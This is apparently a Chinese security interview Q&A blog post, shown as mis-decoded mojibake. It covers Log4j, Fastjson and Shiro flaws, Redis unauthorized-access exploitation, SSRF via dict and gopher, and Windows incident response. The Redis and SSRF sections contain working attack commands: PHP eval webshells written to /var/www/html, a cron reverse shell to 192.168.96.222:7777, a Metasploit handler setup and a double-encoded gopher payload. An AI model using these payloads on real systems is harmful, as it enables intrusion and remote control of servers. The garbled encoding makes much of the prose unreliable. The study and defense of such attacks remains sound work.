Log4j ÊÇApache µÄÒ»¸ö¿ªÔ´ÏîÄ¿£¬ÊÇÒ»¿î»ùÓÚJava µÄ¿ªÔ´ÈÕÖ¾¼Í¼¹¤¾ß¡£¸ÃÎó²îÖ÷ÒªÊÇÓÉÓÚÈÕÖ¾ÔÚ´òӡʱµ±Óöµ½`${`ºó£¬ÒÔ:ºÅ×÷Ϊ֧½â£¬½«±í´ïʽÄÚÈÝÖ§½â³ÉÁ½²¿·Ö£¬Ç°ÃæÒ»²¿·Öprefix£¬ºóÃæ²¿·Ö×÷Ϊkey£¬È»ºóͨ¹ýprefixÈ¥ÕÒ¶ÔÓ¦µÄlookup£¬Í¨¹ý¶ÔÓ¦µÄlookupʵÀýŲÓÃlookupÒªÁ죬×îºó½«key×÷Ϊ²ÎÊý´øÈëÖ´ÐУ¬Òý·¢Ô¶³Ì´úÂëÖ´ÐÐÎó²î¡£
Ïêϸ²Ù×÷£º
ÔÚÕý³£µÄlog´¦Öóͷ£Àú³ÌÖжÔ**${**ÕâÁ½¸ö½ôÁÚµÄ×Ö·û×öÁ˼ì²â£¬Ò»µ©Æ¥Åäµ½ÀàËÆÓÚ±í´ïʽ½á¹¹µÄ×Ö·û´®¾Í»á´¥·¢Ìæ»»»úÖÆ£¬½«±í´ïʽµÄÄÚÈÝÌæ»»Îª±í´ïʽÆÊÎöºóµÄÄÚÈÝ£¬¶ø²»ÊDZí´ïʽ×Ô¼º£¬´Ó¶øµ¼Ö¹¥»÷Õ߽ṹÇкÏÒªÇóµÄ±í´ïʽ¹©ÏµÍ³Ö´ÐÐ
Fastjson·´ÐòÁл¯Îó²î
Åжϣº
Õý³£ÇëÇóÊÇgetÇëÇó²¢ÇÒûÓÐÇëÇóÌ壬¿ÉÒÔͨ¹ý½á¹¹¹ýʧµÄPOSTÇëÇ󣬼´¿ÉÉó²éÔÚ·µ»Ø°üÖÐÊÇ·ñÓÐfastjsonÕâ¸ö×Ö·û´®À´Åжϡ£
ÔÀí£º
fastjsonÊǰ¢Àï°Í°Í¿ª·¢µÄÒ»¿î½«json×Ö·û´®ºÍjava¹¤¾ß¾ÙÐÐÐòÁл¯ºÍ·´ÐòÁл¯µÄ¿ªÔ´jsonÆÊÎö¿â¡£fastjsonÌṩÁËautotype¹¦Ð§£¬ÔÚÇëÇóÀú³ÌÖУ¬ÎÒÃÇ¿ÉÒÔÔÚÇëÇó°üÖÐͨ¹ýÐÞ¸Ä@typeµÄÖµ£¬À´·´ÐòÁл¯ÎªÖ¸¶¨µÄÀàÐÍ£¬¶øfastjsonÔÚ·´ÐòÁл¯Àú³ÌÖлáÉèÖúͻñÈ¡ÀàÖеÄÊôÐÔ£¬ÈôÊÇÀàÖб£´æ¶ñÒâÒªÁ죬¾Í»áµ¼Ö´úÂëÖ´ÐеÈÕâÀàÎÊÌâ¡£
ÎÞ»ØÏÔÔõô°ì£º
1.Ò»ÖÖÊÇÖ±½Ó½«ÏÂÁîÖ´ÐÐЧ¹ûдÈëµ½¾²Ì¬×ÊÔ´ÎļþÀÈçhtml¡¢jsµÈ£¬È»ºóͨ¹ýhttp»á¼û¾Í¿ÉÒÔÖ±½Ó¿´µ½Ð§¹û
2.ͨ¹ýdnslog¾ÙÐÐÊý¾ÝÍâ´ø£¬µ«ÈôÊÇÎÞ·¨Ö´ÐÐdnsÇëÇó¾ÍÎÞ·¨ÑéÖ¤ÁË
3.Ö±½Ó½«ÏÂÁîÖ´ÐÐЧ¹û»ØÏÔµ½ÇëÇóPocµÄHTTPÏìÓ¦ÖÐ
Shiro·´ÐòÁл¯Îó²î
ÔÀí£º
ShiroÊÇApacheϵÄÒ»¸ö¿ªÔ´JavaÇå¾²¿ò¼Ü£¬Ö´ÐÐÉí·ÝÈÏÖ¤£¬ÊÚȨ£¬ÃÜÂëºÍ»á»°ÖÎÀí¡£shiroÔÚÓû§µÇ¼ʱ³ýÁËÕ˺ÅÃÜÂëÍ⻹ÌṩÁË¿Éת´ïÑ¡Ïîremember me¡£Óû§ÔڵǼʱÈôÊǹ´Ñ¡ÁËremember meÑ¡ÏÄÇôÔÚÏÂÒ»´ÎµÇ¼ʱä¯ÀÀÆ÷»áЯ´øcookieÖеÄremember me×Ö¶ÎÌᳫÇëÇ󣬾Ͳ»ÐèÒªÖØÐÂÊäÈëÓû§ÃûºÍÃÜÂë¡£
Åжϣº
1.Êý¾Ý·µ»Ø°üÖаüÀ¨rememberMe=deleteMe×ֶΡ£
2.Ö±½Ó·¢ËÍÔÊý¾Ý°ü£¬·µ»ØµÄÊý¾ÝÖв»±£´æÒªº¦×Ö¿ÉÒÔͨ¹ýÔÚ·¢ËÍÊý¾Ý°üµÄcookieÖÐÔöÌí×ֶΣº****rememberMe=È»ºóÉó²é·µ»ØÊý¾Ý°üÖÐÊÇ·ñ±£´æÒªº¦×Ö¡£
shiro-550£º
shiro·´ÐòÁл¯Îó²îʹÓÃÓÐÁ½¸öÒªº¦µã£¬Ê×ÏÈÊÇÔÚshiro<1.2.4ʱ£¬AES¼ÓÃܵÄÃÜÔ¿Key±»Ó²±àÂëÔÚ´úÂëÀֻҪÄÜ»ñÈ¡µ½Õâ¸ökey¾Í¿ÉÒԽṹ¶ñÒâÊý¾ÝÈÃshiroʶ±ðΪÕý³£Êý¾Ý¡£ÁíÍâ¾ÍÊÇshiroÔÚÑéÖ¤rememberMeʱʹÓÃÁËreadObjectÒªÁ죬readObjectÓÃÀ´Ö´Ðз´ÐòÁл¯ºóÐèÒªÖ´ÐеĴúÂëÆ¬¶Ï£¬´Ó¶øÔì³É¶ñÒâÏÂÁî¿ÉÒÔ±»Ö´ÐС£¹¥»÷Õ߽ṹ¶ñÒâ´úÂ룬²¢ÇÒÐòÁл¯£¬AES¼ÓÃÜ£¬base64±àÂëºó£¬×÷ΪcookieµÄrememberMe×ֶη¢ËÍ¡£Shiro½«rememberMe¾ÙÐбàÂ룬½âÃܲ¢ÇÒ·´ÐòÁл¯£¬×îÖÕÔì³É·´ÐòÁл¯Îó²î¡£
shiro-721£º
²»ÐèÒªkey£¬Ê¹ÓÃPadding Oracle Attack½á¹¹³öRememberMe×ֶκó¶ÎµÄֵ͎áÕýµ±µÄRemember¡£
Ê®Æß.Ïàʶ¹ýredisÊý¾Ý¿âºÍ³£¼ûµÄÎó²îÂð£¿
´ð£º
redisÊÇÒ»¸ö·Ç¹ØÏµÐÍÊý¾Ý¿â£¬Ê¹ÓõÄĬÈ϶˿ÚÊÇ6379¡£³£¼ûµÄÎó²îÊÇδÊÚȨ»á¼ûÎó²î£¬¹¥»÷ÕßÎÞÐèÈÏÖ¤¾Í¿ÉÒÔ»á¼ûÄÚ²¿Êý¾Ý¡£Ê¹ÓÃÊÖ¶ÎÖ÷ÒªÓУº
1.ÏòrootȨÏÞÕË»§Ð´Èëssh¹«Ô¿Îļþ£¬Ö±½ÓÃâÃܵǼ·þÎñÆ÷¡£(Êܺ¦Õßredis·ÇrootȨÏÞÔËÐлᱨ´í)
Ìõ¼þ£º
·þÎñÆ÷±£´æ.sshĿ¼ÇÒ¾ßÓÐдÈëµÄȨÏÞ
ÔÀí£º
ÔÚÊý¾Ý¿âÖвåÈëÒ»ÌõÊý¾Ý£¬½«±¾»úµÄ¹«Ô¿×÷Ϊvalue£¬keyÖµËæÒ⣬Ȼºóͨ¹ýÐÞ¸ÄÊý¾Ý¿âµÄĬÈÏ·¾¶Îª/root/.sshºÍĬÈϵĻº³åÎļþauthorized.keys£¬°Ñ»º³åµÄÊý¾ÝÉúÑÄÔÚÎļþÀÕâÑù¾Í¿ÉÒÔÔÚ·þÎñÆ÷¶ËµÄ/root/.sshÏÂÌìÉúÒ»¸öÊÚȨµÄkey¡£
2.дÈëwebshell
Ìõ¼þ£º
ÒÑÖªweb¾ø¶Ô·¾¶¡£
°ì·¨£º
1. redis -cli -h 192.168.x.x ÅþÁ¬Ä¿µÄ·þÎñÆ÷
2. config set dir "/var/www/html" ÉèÖÃÉúÑÄÎļþ·¾¶
3. config set dbfilename shell.php ÉèÖÃÉúÑÄÎļþÃû
4. set x "\n\n<?php @eval($_POST['cmd']); ?>\n" ½«webshellдÈëx¼üÖµÖÐ
5. save ÉúÑÄ
¾ÖÏÞ£º
1.·þÎñÆ÷´¦ÓÚÄÚÍø£¬Ð´ÈëwebshellºóÎÒÃǵĹ«ÍøIPÎÞ·¨ÅþÁ¬
2.·þÎñÆ÷IPµØµã²»Àο¿
3.6379¶Ë¿Ú²»ÔÊÐíÈëÆ«Ïò
4.ÉÏ´«webshell¿ÉÄÜÖ±½Ó±»É±¶¾Èí¼þɾ³ý
3.·´µ¯ÅþÁ¬shell
ÉèÖüàÌý¶Ë¿Ú£¬³£ÓõŤ¾ß1.msf 2.netcat 3.socatʹÓÃmsfÉèÖüàÌý°ì·¨£º1. use exploit/multi/handler2. set payload generic/shell_reverse_tcp3. set lhost 192.168.x.x ĬÈϼàÌý¶Ë¿ÚΪ44444. run
4.׼ʱʹÃü·´µ¯shell
°ì·¨£º×¼Ê±Ê¹ÃüÓõıí´ïʽ £ºCron±í´ïʽÊÇÒ»¸ö×Ö·û´®£¬¸Ã×Ö·û´®ÓÉ6¸ö¿Õ¸ñ·ÖΪ7¸öÓò£¬Ã¿Ò»¸öÓò´ú±íÒ»¸öʱ¼ä¼ÄÒå¡£·Ö ʱ Ìì Ô ÖÜ user-name(Óû§) command(ÏÂÁî) ºÃ±Èÿ¹ýÒ»·ÖÖÓÏòrootÓû§µÄ׼ʱʹÃüÖÐдÈë·´µ¯ÅþÁ¬ÏÂÁî(1) config set dir /var/spool/cron/ //Ŀ¼Çл»µ½×¼Ê±Ê¹ÃüµÄÎļþ¼ÐÖÐ(2) config set dbfilename root //ÉèÖÃÉúÑÄÎļþÃû(3)set x "\n * * * * * bash -i >& /dev/tcp/192.168.96.222/7777 0>&1\n" //½«·´µ¯shellдÈëx¼üÖµÖÐ(4)save //ÉúÑÄ
ʹÓÃ׼ʱʹÃü·´µ¯shellÔÚÄ¿µÄϵͳÊÇCentosÉÏ¿ÉÓã¬UbuntuÉÏÓÐÏÞÖÆ
ÀíÓÉÈçÏ£º
1.ĬÈÏredisдÎļþºóÊÇ644µÄȨÏÞ£¬µ«ubuntuÒªÇóÖ´ÐÐ׼ʱʹÃü¼þ/var/spool/cron/crontabs/ȨÏÞ±ØÐèÊÇ600Ò²¾ÍÊÇ-rw-------²Å»áÖ´ÐУ¬²»È»»á±¨´í£¬¶øCentosµÄ׼ʱʹÃüÎļþȨÏÞ644Ò²ÄÜÖ´ÐÐ2.redisÉúÑÄRDB»á±£´æÂÒÂ룬ÔÚUbuntuÉϻᱨ´í£¬¶øÔÚCentosÉϲ»»á±¨´í3.Á½¸öϵͳµÄ׼ʱʹÃüÎļþĿ¼²î±ð
ʹÓÃÖ÷´Ó¸´ÖÆgetshell
Ìõ¼þ£º°æ±¾(4.x~5.0.5)ÔÀí£ºÊý¾Ý¶ÁдÌåÁ¿ºÜ´óʱ£¬ÎªÁ˼õÇá·þÎñÆ÷µÄѹÁ¦£¬redisÌṩÁËÖ÷´Óģʽ£¬Ö÷´Óģʽ¾ÍÊÇÖ¸¶¨Ò»¸öredisʵÀý×÷ΪÖ÷»ú£¬ÆäÓàµÄ×÷Ϊ´Ó»ú£¬ÆäÖÐÖ÷»úºÍ´Ó»úµÄÊý¾ÝÊÇÏàͬµÄ£¬¶ø´Ó»úÖ»ÈÏÕæ¶Á£¬Ö÷»úÖ»ÈÏÕæÐ´¡£Í¨¹ý¶ÁдÊèÉ¢¿ÉÒÔ¼õÇá·þÎñÆ÷¶ËµÄѹÁ¦¡£Ê¹Óù¤¾ß£ºRedisRogueServerµØµã£ºhttps://github.com/n0b0dyCN/redis-rogue-serverʹÓù¤¾ßµÄÏÂÁpython3 redis-rogue-server.py --rhost=x.x.x.x --lhost=x.x.x.x --exp=exp.soÁ½ÖÖʹÓÃÒªÁ죺½»»¥Ê½·´µ¯Ê½ÏÞÖÆ£ºÊ¹ÓÃÕâ¸öÒªÁìgetshell»òÕßrceí§Òâµ¼ÖÂredis·þÎṉ̃»¾£¬Ò»Ñùƽ³£²»½¨ÒéʹÓÃ
redisδÊÚȨ»á¼ûÎó²îµÄÌá·À²½·¥£º
1.Ìí¼ÓµÇ¼ÃÜÂë
2.ÐÞ¸ÄĬÈ϶˿Ú
3.¹Ø±Õ¶Ë¿Ú
4.եȡÒÔrootÓû§È¨ÏÞÆô¶¯£¬ÒÔµÍȨÏÞÆô¶¯redis·þÎñ
Ê®°Ë. SSRFÔõôÍŽáRedisÏà¹ØÎó²îʹÓã¿
´ð£º
Ö÷Ҫͨ¹ýÁ½ÖÖÐÒ飬dictÐæÅºÍgopherÐÒé¡£
dictÐÒéʹÓÃredisÏà¹ØÎó²î£º
̽²â¶Ë¿Ú£º
ssrf.php?url=dict://x.x.x.x:$¶Ë¿Ú$ ʹÓÃburpsuite±¬ÆÆ¶Ë¿Ú
̽²âÊÇ·ñÉèÖÃÈõ¿ÚÁ
ssrf.php?url=dict://x.x.x.x:6379/info ÒÑÖª¶Ë¿ÚʹÓÃinfo̽²âÊÇ·ñÉèÖÃÁËÃÜÂë
±¬ÆÆÃÜÂ룺
ssrf.php?url=dict://x.x.x.x:6379/auth:$ÃÜÂë$ ʹÓÃburpsuite±¬ÆÆÃÜÂë
дÈëwebshell£º
1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html Çл»ÎļþĿ¼2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php ÉèÖÃÉúÑÄÎļþÃû3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e" //ʹÓÃdictÐÒéдÈëwebshell ÒÔÉϵÄ×Ö·û±àÂëÊÇ<?php phpinfo();?>µÄÊ®Áù½øÖÆ4. url=dict://x.x.x.x:6379/save ÉúÑÄ
1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html Çл»ÎļþĿ¼
2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php ÉèÖÃÉúÑÄÎļþÃû
3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"
//ʹÓÃdictÐÒéдÈëwebshell ÒÔÉϵÄ×Ö·û±àÂëÊÇ<?php phpinfo();?>µÄÊ®Áù½øÖÆ
4.ssrf.php?url=dict://x.x.x.x:6379/save ÉúÑÄ
dictÐÒéʹÓÃÍýÏëʹÃü·´µ¯shell»òÕßдÈëssh¹«Ô¿µÄÊÖ¶ÎÀàËÆ
gopherÐÒéʹÓÃredisδÊÚȨ»á¼ûÎó²îдÈëwebshell£º
ͨÀýʹÓð취£º
set x "\n\n\n<?php @eval($_POST['redis']);?>\n\n\n"
config set dir /var/www/html
config set dbfilename shell.php
save
Á½´Îurl±àÂëºó½á¹¹url£º
http://192.168.1.1/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%30%25%32%30%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

//µÚÒ»´Îurl½âÂëºÍµÚ¶þ´Îurl½âÂë
//ͬÀíÆäËûÀàËÆÍýÏëʹÃü·´µ¯ºÍдÈëssh¹«Ô¿µÈgetshell·½·¨ÏàËÆ
Ê®¾Å. windowsÓ¦¼±ÏìӦʱÅŲéÆÊÎöµÄÏà¹ØÏ¸½Ú£¿
´ð£º
¿ÉÒÉÕ˺ÅÅŲé lusrmgr.msc
1.¼ì²é·þÎñÆ÷ÊÇ·ñÓÐÈõ¿ÚÁî¡£ºÃ±È¿Õ¿ÚÁî»òÕßÃÜÂëÖØÆ¯ºó²»·ó¡£
2.¸ßΣ¶Ë¿ÚÊÇ·ñ¶ÔÍ⿪·Å£¬ºÃ±ÈSSH·þÎñ22¶Ë¿Ú£¬RDP·þÎñ3389¶Ë¿ÚµÈ¡£
3.Éó²é·þÎñÆ÷ÊÇ·ñÓпÉÒÉÕ˺š£
ÊÖ¹¤·½Ã棺lusrmgr.mscÏÂÁîÉó²éÓû§ºÍ×飬Éó²éÊÇ·ñÓÐÐÂÔöÕ˺ţ¬Òþ²ØÕ˺ţ¬¿Ë¡Õ˺š£
¹¤¾ß·½Ã棺ºÃ±ÈʹÓÃD¶ÜµÈ¹¤¾ßÀ´¼ì²âÒþ²ØÕ˺š£
4.ÍŽáÈÕÖ¾ÆÊÎö eventvwr.msc Éó²éÖÎÀíÔ±µÇ¼ʱ¼ä£¬Ïà¹ØÊÂÎñÊÇ·ñÓÐÒì³£¡£
Ãô¸ÐÊÂÎñID£º
4624 µÇ¼ÀÖ³É
4625 µÇ¼ʧ°Ü
4672 ʹÓó¬µÈÖÎÀíÔ±¾ÙÐеǼ
4720 ½¨ÉèÓû§
5.ʹÓÃquery userÉó²éÄ¿½ñϵͳµÄ»á»°£¬ºÃ±ÈÉó²éÊÇ·ñÓÐÈËʹÓÃÔ¶³ÌµÇ¼·þÎñÆ÷¡£
¿ÉÒÉÀú³ÌºÍ·þÎñÅŲé taskmgr services.msc
1.Éó²éCPU£¬ÄÚ´æ£¬ÍøÂçµÈ×ÊÔ´ÊÇ·ñÓпÉÒÉ״̬¡£ºÃ±ÈCPUÕ¼ÓÃÂʹý¸ß¿ÉÄÜÊÇÖÐÁËÍڿ󲡶¾£¬´ÅÅ̿ռä´ó×ÚÕ¼ÓÿÉÄÜÊǾ籾»ò²¡¶¾´ó×ÚÌìÉúºÍ¸´ÖÆÒþ²ØÎļþ¡£
2.¼ì²éÀú³ÌÃû
ijЩÀú³ÌÃûÊÇ´ó×ÚËæ»úµÄÇéÐΣ¬ºÃ±ÈhrlC3.tmp¡¢hrlD5.tmp¡¢hrl6.tmp¡¢hrlEE.tmpµÈ¶à¸öÃû×ÖÏàËÆµÄÀú³Ì£¬»ù±¾ÉÏ¿ÉÒԶ϶¨ÊÇÒì³£Àú³Ì¡£
Òì³£Àú³ÌÃûαװ³ÉϵͳÀú³Ì»òÕß˵³£¼û·þÎñµÄÀú³ÌÃû£¬´Ëʱ¿ÉÒÔͨ¹ýÀú³ÌÐÎòÀ´Åжϣ¬²¢ÇÒÐèÒªÊÖ¹¤±ÈÕÕ¡£
3.¼ì²éÀú³ÌºÍ·þÎñÐÎò£¬ÐÞ¸Äʱ¼ä»òÕßÊý×ÖÊðÃûÊÇ·ñÓÐÒì³£¡£
4.ʹÓù¤¾ß¾ÙÐмì²â£¬ºÃ±ÈProcess Hunter»òÕß»ðÈÞ½£µÈרÃÅÕë¶ÔÀú³Ì·þÎñÐÅÏ¢µÄÅŲéÆÊÎö¹¤¾ß£¬Ö÷ÒªÉó²éµÄÊǹ«Ë¾Ãû£¬ÐÎò£¬Ç徲״̬ºÍÆô¶¯ÀàÐ͵ȷ½ÃæÀ´ÅŲ顣
¿ÉÒÉÆô¶¯ÏîÅŲé msconfig
1. msconfig»òÕßʹÃüÖÎÀíÆ÷ÖÐµÄÆô¶¯ÏîÉó²éÃû³Æ£¬Ðû²¼ÕßºÍÆô¶¯Ó°Ï죬ÒÔ¼°ÓÒ¼üÉó²éÊôÐÔÀ´¿´Êý×ÖÊðÃûºÍÐÞ¸Äʱ¼ä¡£
2. ÍŽṤ¾ß¾ÙÐÐÅŲ飬ºÃ±È»ðÈÞ½£µÈ¹¤¾ß£¬»á½«Æô¶¯Ïî·ÖÀàΪµÇ¼£¬Çý¶¯³ÌÐò£¬ÍýÏëʹÃü£¬Ó³ÏñÐ®ÖÆµÈ£¬Ê¹ÓÃÆÊÎöÅŲé
¿ÉÒÉÎļþÅŲé
1.¸÷¸ö´ÅÅ̵ÄTemp/tmpĿ¼ÖÐÊÇWindows±¬·¢µÄÔÝʱÎļþ£¬Éó²éÓÐÎÞÒì³£Îļþ¡£
2.RecentĿ¼»á¼Í¼×î½ü·¿ªµÄÎĵµÒÔ¼°³ÌÐòµÄÏà¹Ø¼Í¼¡£
3.Éó²éÎļþµÄ½¨Éèʱ¼ä£¬ÐÞ¸Äʱ¼äºÍ»á¼ûʱ¼ä£¬ºÃ±È˵¹¥»÷ÕßʹÓò˵¶µÈ¹¤¾ß¶ÔÎļþ¾ÙÐÐÐ޸Ļá¸Ä±äÐÞ¸Äʱ¼ä£¬ÈôÊÇÐÞ¸Äʱ¼äÔÚ½¨Éèʱ¼ä֮ǰ£¬ÄǾÍÊǺÜÏÔ×ŵĿÉÒÉÎļþ¡£
4.windowsϵͳÎҵĵçÄÔ¿ìËÙ»á¼û£¬¿ÉÒÔ¿´µ½×î½üʹÓõÄÎļþ£¬ºÃ±È˵ͼƬ»òÕßѹËõ°üµÈÎļþµÄʹÓÃÀúÊ·ºÍÎļþ·¾¶¶¼»áÏÔʾ¡£
¶ñÒâÑù±¾ÅŲé
1.¶ñÒâÑù±¾Ö¸µÄÒ»Ñùƽ³£ÊÇwebshell£¬²¡¶¾£¬Ä¾Âí»òÕߺóÃųÌÐò»òÎļþ£¬¿ÉÒÔÆ¾Ö¤×°±¸µÄ¸æ¾¯ÐÅÏ¢À´²éÕÒÏà¹ØÂ·¾¶£¬ÔÙÅŲéÏà¹ØµÄÀú³ÌºÍÆô¶¯Ïî¡£
2.²»Öªõè¾¶¾¶µÄ»°¿ÉÒÔʹÓÃÏà¹ØµÄÇå¾²×°±¸À´¾ÙÐмì²â£¬ºÃ±È˵ͨ¹ýD¶Ü£¬ºÓÂí²éɱµÈ¹¤¾ß¶Ôwebshell¿ÉÄܱ£´æµÄĿ¼¾ÙÐÐÒ»¸öÅŲé²éɱ£¬Ê¹ÓÃͨÀýµÄ·À»ðǽÈí¼þÀ´¶ÔͨÅÌ»òÕß¿ÉÒÉĿ¼ɨÃ財¶¾¡£
¶þÊ®. ³£¼ûµÄwebshellÅþÁ¬¹¤¾ßÁ÷Á¿£¿
´ð£º
Öйú²Ëµ¶
ÅþÁ¬Àú³ÌÖÐʹÓÃbase64±àÂë¶Ô·¢Ë͵ÄÖ¸Áî¾ÙÐмÓÃÜ£¬ÆäÖÐÁ½¸öÒªº¦payload z1 ºÍ z2£¬Ãû×Ö¶¼ÊǿɱäµÄ¡£
È»ºóÉÐÓÐÒ»¶ÎÒÔQG¿ªÍ·£¬7J×îºóµÄÀο¿´úÂë¡£
ÒϽ£
ĬÈϵÄuser-agentÇëÇóÍ·ÊÇantsword xxx£¬²»¹ý¿ÉÒÔÐ޸ġ£
Ò»Ñùƽ³£½«payload¾ÙÐзֶΣ¬È»ºó»®·Ö¾ÙÐÐbase64±àÂ룬һÑùƽ³£¾ßÓÐÏñevalÕâÑùµÄÒªº¦×Ö£¬È»ºóÄØ»òÐíÂÊÉÐÓÐ@ini_set("display","0");Õâ¶Î´úÂë¡£
±ùЫ
php´úÂëÖпÉÄܱ£´æeval£¬assertµÈÒªº¦´Ê£¬jsp´úÂëÖпÉÄÜ»áÓÐgetclass()£¬getclassLoader()µÈ×Ö·ûÌØÕ÷¡£
±ùЫ2.0
µÚÒ»½×¶ÎÇëÇóÖзµ»Ø°üµÄ״̬ÂëÊÇ200£¬·µ»ØÄÚÈÝÊÇ16λµÄÃÜÔ¿¡£½¨ÉèÅþÁ¬ºóµÄcookieÃûÌö¼ÊÇCookie£ºPHPSessid=xxxx £»path=/£»ÌØÕ÷¡£
±ùЫ3.0
ÇëÇó°üÖеÄconten-length×Ö¶ÎÊÇ5740»òÕß5720£¬È»ºóÇëÇóÍ·Ò²¾ßÓÐÌØÕ÷ÐÅÏ¢£¬²»¹ýÕâ¸ö½ÏÁ¿³¤£¬Ã»ÓмÇ×Å¡£
¸ç˹À
1.jsp´úÂëÖпÉÄÜ»á¾ßÓÐgetclass£¬getclassLoaderµÈÒªº¦×Ö£¬payloadʹÓÃbase64±àÂëµÈÌØÕ÷¡£phpºÍaspÔòÊÇͨË×µÄÒ»¾ä»°Ä¾Âí¡£
2.ÔÚÏìÓ¦°üµÄcache-control×Ö¶ÎÖÐÓÐno-store£¬no-cacheµÈÌØÕ÷¡£
3.ËùÓÐÇëÇóÖеÄcookie×Ö¶Î×îºóÃæ¶¼±£´æ£»ÌØÕ÷
¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª
×÷ÕߣºÈȰ®»¼Ò·òÈË
ÔÎÄÁ´½Ó£ºhttps://blog.csdn.net/zlloveyouforever/article/details/125174473
- Òªº¦´Ê±êÇ©£º
- ¹¤¾ßɨÃè wiresharkÍøÂç·â°üÆÊÎö¹¤¾ß